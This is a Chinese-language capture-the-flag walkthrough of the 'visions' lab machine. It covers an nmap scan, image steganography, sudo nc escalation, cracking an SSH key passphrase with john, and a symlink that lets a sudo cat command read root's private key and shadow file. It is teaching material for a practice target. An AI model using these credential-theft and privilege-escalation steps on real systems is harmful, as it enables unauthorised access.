【OSCP】visions

admin 2024年4月2日13:55:22评论1 views字数 1674阅读5分34秒阅读模式
【OSCP】visions

OSCP 靶场

【OSCP】visions

靶场介绍

visions

easy

图片隐写、图片调试、exiftool使用、sudo-nc提权、ssh私钥提权、ssh2john使用、john爆破私钥、ssh 私钥利用

信息收集

主机发现

【OSCP】visions

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.216 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-02 20:35 EST
Nmap scan report for 192.168.1.216
Host is up (0.00056s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 85:d0:93:ff:b6:be:e8:48:a9:2c:86:4c:b6:84:1f:85 (RSA)
| 256 5d:fb:77:a5:d3:34:4c:46:96:b6:28:a2:6b:9f:74:de (ECDSA)
|_ 256 76:3a:c5:88:89:f2:ab:82:05:80:80:f9:6c:3b:20:9d (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:64:6D:AC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS

打开只有一张白图片,还有一段话。

【OSCP】visions

【OSCP】visions

目录扫描

【OSCP】visions

权限获取

通过上面网站的提示,查看图片隐写发现存在密码,接着使用alicia 账号登录成功,获取权限。

【OSCP】visions

【OSCP】visions

查看passwd 和 home 发现存在多个账号。

【OSCP】visions

权限提升

sudo-nc 提权

这里通过sudo 提权到emma账号

【OSCP】visions

图片分析

这里提权到其他用户遇到了难题,后面发现通过调整图片曝光度之后,发现存在账号密码

https://pixlr.com/cn/express/

【OSCP】visions

成功获取第一个flag

【OSCP】visions

【OSCP】visions

ssh 私钥提权

【OSCP】visions

查看获取ssh私钥

【OSCP】visions

这登录还需要密码,我们使用 ssh2johnid_isa 秘钥信息 转换 为 john 可以识别的hash,然后进行爆破

【OSCP】visions

通过john 爆破私钥获取密码

【OSCP】visions

ssh -i id_rsa [email protected]

【OSCP】visions

软链接提权

这里 sudo 具有root 的权限,sophia 用户具有使用 Sudo 读取 /home/isabella/.invisible 的权限,而现在的 isabella 用户有权限修改 /home/isabella/.invisible。我们尝试创建一条软链接,将.invisiblla文件链接到root的私钥上

【OSCP】visions

isabella@visions:~$ rm -rf ./.invisible
isabella@visions:~$ ln -s /root/.ssh/id_rsa ./.invisible

【OSCP】visions

创建后成功读取到root 的私钥

sophia@visions:~$ sudo /usr/bin/cat /home/isabella/.invisible

【OSCP】visions

【OSCP】visions

shadow爆破

使用上面的方法,换个思路,读取root的shadow 文件,然后进行爆破

【OSCP】visions

【OSCP】visions

这里太久了,了解思路即可。完全爆破需要很长时间。【OSCP】visions

End

“点赞、在看与分享都是莫大的支持”

【OSCP】visions

【OSCP】visions

原文始发于微信公众号(贝雷帽SEC):【OSCP】visions

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月2日13:55:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】visionshttps://cn-sec.com/archives/2622925.html

发表评论

匿名网友 填写信息